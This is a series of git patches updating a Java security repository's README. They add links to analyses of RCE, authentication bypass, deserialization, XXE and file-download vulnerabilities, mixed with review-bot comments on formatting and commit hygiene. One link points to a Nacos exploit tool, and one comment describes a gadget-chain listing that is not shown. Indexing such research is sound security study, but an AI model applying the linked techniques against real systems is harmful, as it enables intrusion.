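Review bot: the sentence added ahead of the CC7 variant in index.md (@@ -91,4 +91,80 @@) says the reason will not be explained ("具体为什么就不讲了"), which leaves the key step of the listing undocumented: the reflection block that rewrites the `HashMap` node key with `key.set(node, templates)` after both `hashtable.put` calls. Please add a sentence or a code comment on why that edit is made after insertion. A comment should also say that `main` feeds the serialized bytes straight back into `ois.readObject()`, so running the class triggers the chain in the local JVM, and the blank lines before the closing fence can go.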
From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 1 Nov 2023 09:41:08 +0800 Subject: [PATCH 23/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index d107acd..7fa340d 100644 --- a/README.md +++ b/README.md @@ -388,7 +388,7 @@ - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) - [Metabase-Pre auth RCE](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) - [Ivanti Sentry Authentication Bypass](https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/) - + - [UNAUTHENTICATED SERVER SIDE REQUEST FORGERY & CRLF INJECTION IN GEOSERVER WMS(CRLF注入的好例子)](https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms) From af13705594da841a051bae3f2936d38d7f390480 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 8 Nov 2023 10:11:40 +0800 Subject: [PATCH 24/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 7fa340d..2d4c3a5 100644 --- a/README.md +++ b/README.md 
@@ -38,6 +38,7 @@ - [JSTL(看菜鸟教程即可)](https://www.runoob.com/jsp/jsp-jstl.html) - [JEP290基础概念](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/JEP290%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5/index.md) - [Java中的XXE](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/Java%E4%B8%AD%E7%9A%84XXE/index.md) + - [XML外部实体注入(XXE)攻击方式汇总(关于XXE可以延伸继续看看)](https://tttang.com/archive/1813/) - [通过反射扫描被注解修饰的类](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/%E9%80%9A%E8%BF%87%E5%8F%8D%E5%B0%84%E6%89%AB%E6%8F%8F%E8%A2%AB%E6%B3%A8%E8%A7%A3%E4%BF%AE%E9%A5%B0%E7%9A%84%E7%B1%BB/index.md) - [低版本下Java文件系统00截断](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/%E4%BD%8E%E7%89%88%E6%9C%AC%E4%B8%8BJava%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F00%E6%88%AA%E6%96%AD/index.md) - [有趣的XSS之Normalize](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/%E6%9C%89%E8%B6%A3%E7%9A%84XSS%E4%B9%8BNormalize/index.md) From 16f782d44cc3084e5789ea7e379ffa3ef15eaa59 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 9 Nov 2023 10:04:29 +0800 Subject: [PATCH 25/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 2d4c3a5..cdc1064 100644 --- a/README.md +++ b/README.md 
@@ -390,6 +390,7 @@ - [Metabase-Pre auth RCE](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) - [Ivanti Sentry Authentication Bypass](https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/) - [UNAUTHENTICATED SERVER SIDE REQUEST FORGERY & CRLF INJECTION IN GEOSERVER WMS(CRLF注入的好例子)](https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms) + - [JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793)](https://forum.butian.net/share/2514) From 8b07f3070fdd23ac46a48cc8a916e991e772d441 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 13 Nov 2023 09:51:19 +0800 Subject: [PATCH 26/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Update 某Cloud系统漏洞分析 --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index cdc1064..5ee9215 100644 --- a/README.md +++ b/README.md @@ -470,7 +470,7 @@ - [安全同学讲Maven重打包的故事](https://mp.weixin.qq.com/s?__biz=MzIzOTU0NTQ0MA==&mid=2247510513&idx=1&sn=fbcd84ba56d0c04dbd28b42f10f3bfb1&chksm=e92a94fede5d1de8e8301f8efb9db5e3f1a4fc14a5e29be541668d706a77141bbbd8d63db1ac&mpshare=1&scene=1&srcid=1025aCfF1bF9RgdhX85sgkj3&sharer_sharetime=1666696525299&sharer_shareid=4a549281c7d8f067d766da5aff57a064#rd) - [某软件监控页面RCE漏洞分析(虽然过于简单,但是可以借此了解下OA系统)](https://xz.aliyun.com/t/11778) - [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s/xxAtjFvk9RxWiY-pwGf8Ow) - +- [某Cloud系统漏洞分析](https://forum.butian.net/share/2529) ## 比赛反思 From 669fffbd2d5af9c27df035c8625d5755ab00a045 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 13 Nov 2023 13:48:43 +0800 Subject: [PATCH 27/72] Update README.md CVE-2023-42663 --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 5ee9215..e7a554c 100644 --- a/README.md +++ b/README.md 
@@ -367,6 +367,7 @@ - [Apache Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?__biz=MzkyNDA5NjgyMg==&mid=2247495227&idx=1&sn=5ab9bcc3d89d57ff9799f88c3363814c&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1&scene=1&srcid=0325kmXWImZrXe0btPMEsJDY&sharer_sharetime=1679735505328&sharer_shareid=19374164c9d8647c6159e09a97bb1208#rd) - [Apache Dubbo 反序列化漏洞(CVE-2023-23638)分析及利用探索](https://yyhylh.github.io/2023/04/08/Apache%20dubbo%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2023-23638%EF%BC%89%E5%88%86%E6%9E%90%E5%8F%8A%E5%88%A9%E7%94%A8%E6%8E%A2%E7%B4%A2/) - [Apache Dubbo反序列化漏洞(CVE-2023-23638)完整利用及工程化实践](https://yyhylh.github.io/2023/05/11/Apache%20Dubbo%20%EF%BC%88CVE-2023-23638%EF%BC%89%E5%AE%8C%E6%95%B4%E5%88%A9%E7%94%A8%E5%8F%8A%E5%B7%A5%E7%A8%8B%E5%8C%96%E5%AE%9E%E8%B7%B5/) + - [Apache Airflow: Bypass permission verification to view task instances of other dags(CVE-2023-42663)](https://hackerone.com/reports/2208656) - Oracle - [Oracle E-Business Suite Unauthenticated RCE](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-21587/index.md) - [Exploiting an Order of Operations Bug to Achieve RCE in Oracle Opera](https://blog.assetnote.io/2023/04/30/rce-oracle-opera/) From 73942b1707f30ec26c9eefad4dbed236f63c40b8 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 16 Nov 2023 09:54:35 +0800 Subject: [PATCH 28/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新超链接-浅谈Spring中的Controller参数的验证机制(注意Hibernate Validator的正确配置) --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index e7a554c..78d5d1a 100644 --- a/README.md +++ b/README.md 
@@ -299,7 +299,8 @@ - [SpringBoot全局注册Filter过滤XSS](https://github.com/Y4tacker/JavaSec/blob/main/11.Spring/SpringBoot%E5%85%A8%E5%B1%80%E6%B3%A8%E5%86%8CFilter%E8%BF%87%E6%BB%A4XSS/index.md) -- [Springboot devtools反序列化(难点在于secret的获取,当然比如有actuator端点暴露情况下就会变得任意)](https://novysodope.github.io/2022/05/11/77/) +- [Springboot devtools反序列化(难点在于secret的获取,当然比如有actuator端点暴露情况下就会变得容易)](https://novysodope.github.io/2022/05/11/77/) +- [浅谈Spring中的Controller参数的验证机制(注意Hibernate Validator的正确配置)](https://forum.butian.net/share/2538) ## 12.Shiro From fbaa5194516335f0ff152db2db8c8c02cbdf05a6 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 24 Nov 2023 13:54:24 +0800 Subject: [PATCH 29/72] Update README.md SysAid On-Prem Software CVE-2023-47246 Vulnerability --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 78d5d1a..1b5befd 100644 --- a/README.md +++ b/README.md @@ -386,13 +386,14 @@ - Smartbi - [浅析Smartbi逻辑漏洞](https://y4tacker.github.io/2023/07/05/year/2023/7/%E6%B5%85%E6%9E%90Smartbi%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/) -- 其他 +- Others - [HtmlUnit-RCE](https://siebene.github.io/2022/12/30/HtmlUnit-RCE/) - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) - [Metabase-Pre auth RCE](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) - [Ivanti Sentry Authentication Bypass](https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/) - [UNAUTHENTICATED SERVER SIDE REQUEST FORGERY & CRLF INJECTION IN GEOSERVER WMS(CRLF注入的好例子)](https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms) - [JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793)](https://forum.butian.net/share/2514) + - [SysAid On-Prem Software(CVE-2023-47246)](https://forum.butian.net/share/2577) From c71061932edab35c111b4d4aaa9a7e810b2567a0 Mon Sep 17 00:00:00 2001 
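Review bot: in the @@ -386,13 +386,14 @@ README.md hunk of PATCH 29/72, the list heading changes from `- 其他` to `- Others`, which the subject ("SysAid On-Prem Software CVE-2023-47246 Vulnerability") does not mention and which leaves this one heading in English while section titles such as `## 其他分享` stay in Chinese. Keep the rename out of this commit, or apply it consistently in a separate one.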
From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 28 Nov 2023 09:30:47 +0800 Subject: [PATCH 30/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 1b5befd..25b2c27 100644 --- a/README.md +++ b/README.md @@ -369,6 +369,7 @@ - [Apache Dubbo 反序列化漏洞(CVE-2023-23638)分析及利用探索](https://yyhylh.github.io/2023/04/08/Apache%20dubbo%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2023-23638%EF%BC%89%E5%88%86%E6%9E%90%E5%8F%8A%E5%88%A9%E7%94%A8%E6%8E%A2%E7%B4%A2/) - [Apache Dubbo反序列化漏洞(CVE-2023-23638)完整利用及工程化实践](https://yyhylh.github.io/2023/05/11/Apache%20Dubbo%20%EF%BC%88CVE-2023-23638%EF%BC%89%E5%AE%8C%E6%95%B4%E5%88%A9%E7%94%A8%E5%8F%8A%E5%B7%A5%E7%A8%8B%E5%8C%96%E5%AE%9E%E8%B7%B5/) - [Apache Airflow: Bypass permission verification to view task instances of other dags(CVE-2023-42663)](https://hackerone.com/reports/2208656) + - [Apache Jackrabbit RMI 远程代码执行漏洞分析(CVE-2023-37895)(这个漏洞适合了解RMI攻击的基础)](https://xz.aliyun.com/t/13118) - Oracle - [Oracle E-Business Suite Unauthenticated RCE](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-21587/index.md) - [Exploiting an Order of Operations Bug to Achieve RCE in Oracle Opera](https://blog.assetnote.io/2023/04/30/rce-oracle-opera/) From c03df0718bfce351bd74898c1d7d4c39f42c5014 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 3 Dec 2023 10:28:47 +0800 Subject: [PATCH 31/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Apache ActiveMQ Jolokia远程代码执行不依赖JDK打法(CVE-2022-41678) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 25b2c27..998b2d6 100644 --- a/README.md +++ b/README.md 
@@ -370,6 +370,7 @@ - [Apache Dubbo反序列化漏洞(CVE-2023-23638)完整利用及工程化实践](https://yyhylh.github.io/2023/05/11/Apache%20Dubbo%20%EF%BC%88CVE-2023-23638%EF%BC%89%E5%AE%8C%E6%95%B4%E5%88%A9%E7%94%A8%E5%8F%8A%E5%B7%A5%E7%A8%8B%E5%8C%96%E5%AE%9E%E8%B7%B5/) - [Apache Airflow: Bypass permission verification to view task instances of other dags(CVE-2023-42663)](https://hackerone.com/reports/2208656) - [Apache Jackrabbit RMI 远程代码执行漏洞分析(CVE-2023-37895)(这个漏洞适合了解RMI攻击的基础)](https://xz.aliyun.com/t/13118) + - [Apache ActiveMQ Jolokia远程代码执行不依赖JDK打法](https://y4tacker.github.io/2023/11/30/year/2023/11/Apache-ActiveMQ-Jolokia%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E4%B8%8D%E4%BE%9D%E8%B5%96JDK%E6%89%93%E6%B3%95/) - Oracle - [Oracle E-Business Suite Unauthenticated RCE](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-21587/index.md) - [Exploiting an Order of Operations Bug to Achieve RCE in Oracle Opera](https://blog.assetnote.io/2023/04/30/rce-oracle-opera/) From 1d588c0fd1ce5061ae8cb0e20c1851d81474083c Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 10 Dec 2023 16:07:18 +0800 Subject: [PATCH 32/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Apache Struts2 文件上传分析(S2-066) --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 998b2d6..d8f412a 100644 --- a/README.md +++ b/README.md 
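Review bot: the entry added in the @@ -370,6 +370,7 @@ hunk of PATCH 31/72 omits the CVE id that the commit subject gives (CVE-2022-41678), while the neighbouring Dubbo, Airflow and Jackrabbit entries carry theirs in the link text. Add the id to the link text so the list stays searchable by CVE.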
@@ -221,7 +221,7 @@ - [S2-032学习(清空_memberAccess当中excludedXXX限制通过构造函数调用/使用DefaultMemberAccess覆盖SecurityMemberAccess绕过限制)](https://github.com/Y4tacker/JavaSec/blob/main/7.Struts2%E4%B8%93%E5%8C%BA/S2-032%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.md) - [S2-045学习(通过container获取全局共享的OgnlUtil实例来清除SecurityMemberAccess当中属性的限制)](https://github.com/Y4tacker/JavaSec/blob/main/7.Struts2%E4%B8%93%E5%8C%BA/S2-045%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.md) - [S2-057学习(突破#context被删除限制,从attr作用域获取context对象)](https://github.com/Y4tacker/JavaSec/blob/main/7.Struts2%E4%B8%93%E5%8C%BA/S2-057%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.md) - +- [S2-066学习(变量覆盖的有趣的例子)](https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%86%E6%9E%90-S2-066/) ## 8.关于Tomcat的一些小研究 From b0b9d97ee735338c1d57a78d9289a015eea9c958 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 14 Dec 2023 23:06:09 +0800 Subject: [PATCH 33/72] Update README.md CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index d8f412a..8027373 100644 --- a/README.md +++ b/README.md @@ -396,6 +396,7 @@ - [UNAUTHENTICATED SERVER SIDE REQUEST FORGERY & CRLF INJECTION IN GEOSERVER WMS(CRLF注入的好例子)](https://www.synacktiv.com/advisories/unauthenticated-server-side-request-forgery-crlf-injection-in-geoserver-wms) - [JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793)](https://forum.butian.net/share/2514) - [SysAid On-Prem Software(CVE-2023-47246)](https://forum.butian.net/share/2577) + - [CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177)](https://y4tacker.github.io/2023/12/10/year/2023/12/CrushFTP-Unauthenticated-Remote-Code-Execution-CVE-2023-43177/) From 0fd015423adb489d84b5882e002a8cc67afea0e7 Mon Sep 17 00:00:00 2001 
From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 19 Dec 2023 17:13:23 +0800 Subject: [PATCH 34/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 任意文件下载漏洞的利用思考(总结非常细!) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 8027373..5487138 100644 --- a/README.md +++ b/README.md @@ -477,6 +477,7 @@ - [某软件监控页面RCE漏洞分析(虽然过于简单,但是可以借此了解下OA系统)](https://xz.aliyun.com/t/11778) - [JDK-Xalan的XSLT整数截断漏洞利用构造](https://mp.weixin.qq.com/s/xxAtjFvk9RxWiY-pwGf8Ow) - [某Cloud系统漏洞分析](https://forum.butian.net/share/2529) +- [任意文件下载漏洞的利用思考(总结非常细!)](https://mp.weixin.qq.com/s/3y62xuQJAj2gmtBSKvHHug) ## 比赛反思 From ce90a5fd10ef21877bc141a21bce49726d3e27ff Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 21 Dec 2023 10:31:22 +0800 Subject: [PATCH 35/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 浅谈Spring与安全约束SecurityConstraint --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 5487138..e5359ea 100644 --- a/README.md +++ b/README.md @@ -276,6 +276,7 @@ ## 11.Spring +-[浅谈Spring与安全约束SecurityConstraint](https://forum.butian.net/index.php/share/2283) - [SpirngBoot下结合Tomcat实现无OOB方式下的回显](https://github.com/Y4tacker/JavaSec/blob/main/5.%E5%86%85%E5%AD%98%E9%A9%AC%E5%AD%A6%E4%B9%A0/Spring/springboot-tomcat%E5%9B%9E%E6%98%BE/index.md) From c49b9b5c8eb7c21fb69a748a7aa7a5b21299a245 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 21 Dec 2023 10:31:55 +0800 Subject: [PATCH 36/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index e5359ea..53aa0eb 100644 --- a/README.md +++ b/README.md 
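Review bot: the line added in the @@ -276,6 +276,7 @@ hunk of PATCH 35/72 starts with `-[` with no space after the dash, so Markdown will not treat it as a list item like its neighbours. PATCH 36/72 changes only this line to `- [`; squash the two so the history does not carry the broken entry.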
@@ -276,7 +276,7 @@ ## 11.Spring --[浅谈Spring与安全约束SecurityConstraint](https://forum.butian.net/index.php/share/2283) +- [浅谈Spring与安全约束SecurityConstraint](https://forum.butian.net/index.php/share/2283) - [SpirngBoot下结合Tomcat实现无OOB方式下的回显](https://github.com/Y4tacker/JavaSec/blob/main/5.%E5%86%85%E5%AD%98%E9%A9%AC%E5%AD%A6%E4%B9%A0/Spring/springboot-tomcat%E5%9B%9E%E6%98%BE/index.md) From a90959efc899541adea965422ade4e8a375c79d5 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 21 Dec 2023 10:37:47 +0800 Subject: [PATCH 37/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 53aa0eb..f97791b 100644 --- a/README.md +++ b/README.md @@ -276,6 +276,7 @@ ## 11.Spring +- [浅谈SpringWeb请求解析过程(很不错的文章把低版本一些绕过的特性基本都提到了)](https://forum.butian.net/share/2214) - [浅谈Spring与安全约束SecurityConstraint](https://forum.butian.net/index.php/share/2283) - [SpirngBoot下结合Tomcat实现无OOB方式下的回显](https://github.com/Y4tacker/JavaSec/blob/main/5.%E5%86%85%E5%AD%98%E9%A9%AC%E5%AD%A6%E4%B9%A0/Spring/springboot-tomcat%E5%9B%9E%E6%98%BE/index.md) From 51f90702af465a58323016da55ea2e024cb4e316 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Fri, 22 Dec 2023 21:26:37 +0800 Subject: [PATCH 38/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index f97791b..857f92a 100644 --- a/README.md +++ b/README.md @@ -442,6 +442,7 @@ ## 19.ASM与JVM学习 +- [目前看到关于ASM框架最详细的学习教程](https://lsieun.github.io/java/asm/) - [JAVA虚拟机执行模型(关注引入了栈映射帧,用于加快虚拟机中类验证过程的速度)](https://www.cnblogs.com/coding-way/p/6600647.html) - [What is a stack map frame](https://stackoverflow.com/questions/25109942/what-is-a-stack-map-frame) - 这里比较有意思的是:Java 1.7引入了此选项以加速类验证。框架分为两部分:变量类型和堆栈类型。第一帧由方法类型描述。在每个GOTO / JUMP调用之后,您需要提供堆栈映射框架的更新描述。为了节省空间,可以使用SAME,APPEND等选项,也可以通过指定变量类型的FULL数组再次描述所有变量。 From e581e2915cde55755a4b8eac8f5dc99888bb33b0 Mon Sep 17 00:00:00 2001 
From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sat, 23 Dec 2023 02:01:01 +0800 Subject: [PATCH 39/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新2023补天白帽大会议题 --- README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 857f92a..bb548da 100644 --- a/README.md +++ b/README.md @@ -439,15 +439,17 @@ - [网上看到的Jetty的部分解析特性(支持%uxxx)](https://www.wangan.com/p/7fyg8k2c7781675a) - ## 19.ASM与JVM学习 -- [目前看到关于ASM框架最详细的学习教程](https://lsieun.github.io/java/asm/) + - [JAVA虚拟机执行模型(关注引入了栈映射帧,用于加快虚拟机中类验证过程的速度)](https://www.cnblogs.com/coding-way/p/6600647.html) - [What is a stack map frame](https://stackoverflow.com/questions/25109942/what-is-a-stack-map-frame) - 这里比较有意思的是:Java 1.7引入了此选项以加速类验证。框架分为两部分:变量类型和堆栈类型。第一帧由方法类型描述。在每个GOTO / JUMP调用之后,您需要提供堆栈映射框架的更新描述。为了节省空间,可以使用SAME,APPEND等选项,也可以通过指定变量类型的FULL数组再次描述所有变量。 - [为什么JVM需要DUP指令](https://www.cnblogs.com/clayjj/p/7698035.html) +## 20.议题 +- [Hacking FernFlower](https://y4tacker.github.io/2023/12/22/year/2023/12/Hacking-FernFlower/) + ## 其他分享 From 7b3210f822128a65dbd04a399ffce86d87e7c195 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 27 Dec 2023 22:40:13 +0800 Subject: [PATCH 40/72] Update README.md --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index bb548da..6b33142 100644 --- a/README.md +++ b/README.md 
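Review bot: the @@ -439,15 +439,17 @@ hunk of PATCH 39/72 deletes the `[目前看到关于ASM框架最详细的学习教程](https://lsieun.github.io/java/asm/)` entry that PATCH 38/72 had just added under `## 19.ASM与JVM学习`, while the subject only mentions updating the 2023 conference talk. If the removal is intended, say so in the commit message; otherwise restore the line.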
@@ -373,6 +373,9 @@ - [Apache Airflow: Bypass permission verification to view task instances of other dags(CVE-2023-42663)](https://hackerone.com/reports/2208656) - [Apache Jackrabbit RMI 远程代码执行漏洞分析(CVE-2023-37895)(这个漏洞适合了解RMI攻击的基础)](https://xz.aliyun.com/t/13118) - [Apache ActiveMQ Jolokia远程代码执行不依赖JDK打法](https://y4tacker.github.io/2023/11/30/year/2023/11/Apache-ActiveMQ-Jolokia%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E4%B8%8D%E4%BE%9D%E8%B5%96JDK%E6%89%93%E6%B3%95/) + - Apache OFBiz + - [Apache OFBiz漏洞 CVE-2023-49070 的前世今生(非常详细)](https://mp.weixin.qq.com/s/iAvitO6otPdHSu1SjRNX3g) + - [Apache OFBiz未授权命令执行浅析(CVE-2023-51467)](https://y4tacker.github.io/2023/12/27/year/2023/12/Apache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467/) - Oracle - [Oracle E-Business Suite Unauthenticated RCE](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-21587/index.md) - [Exploiting an Order of Operations Bug to Achieve RCE in Oracle Opera](https://blog.assetnote.io/2023/04/30/rce-oracle-opera/) From 99d8e846427c22efadd5c4c8d1c19db8eba17427 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 28 Dec 2023 09:34:53 +0800 Subject: [PATCH 41/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 6b33142..8171c92 100644 --- a/README.md +++ b/README.md 
@@ -385,7 +385,7 @@ - Nacos - [Aliababa Nacos hessian JRaft反序列化(文章里提到的只能打一次有误,后经过研究可以打多次)](https://y4er.com/posts/nacos-hessian-rce/ ) - - [Nacos 多次打非完全体方案(这人也没完全考虑到容错,但是网上暂时只有这人的,实际上在构建WriteRequest缺少setOperation)(慎用!别把别人打崩了!)](https://github.com/c0olw/NacosRce) + - [Nacos 多次打非完美方案(这人也没完全考虑到容错,但是网上暂时只有这人的,实际上在构建WriteRequest缺少setOperation)(慎用!别把别人打崩了!)](https://github.com/c0olw/NacosRce) - Adobe - [CVE-2023-29298: Adobe ColdFusion Access Control Bypass](https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/) From 88f23665f74361d42a42c527ed8866ae214f666f Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 8 Jan 2024 18:43:08 +0800 Subject: [PATCH 42/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 8171c92..a6186c1 100644 --- a/README.md +++ b/README.md 
@@ -367,6 +367,7 @@ - [Apache Commons JXPath 远程代码执行](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-41852/index.md) - [Apache Commons Text 远程代码执行](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-42889/index.md) - [Log4j2-RCE分析](http://blog.gm7.org/%E4%B8%AA%E4%BA%BA%E7%9F%A5%E8%AF%86%E5%BA%93/02.%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/01.Java%E5%AE%89%E5%85%A8/03.%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/06.log4j2_rce%E5%88%86%E6%9E%90.html#%E5%A4%8D%E7%8E%B0) + - [Log4j2不出网检测(靠类型转换、危害有限思路值得学习)](https://cloud.tencent.com/developer/article/2036012) - [Apache Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?__biz=MzkyNDA5NjgyMg==&mid=2247495227&idx=1&sn=5ab9bcc3d89d57ff9799f88c3363814c&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1&scene=1&srcid=0325kmXWImZrXe0btPMEsJDY&sharer_sharetime=1679735505328&sharer_shareid=19374164c9d8647c6159e09a97bb1208#rd) - [Apache Dubbo 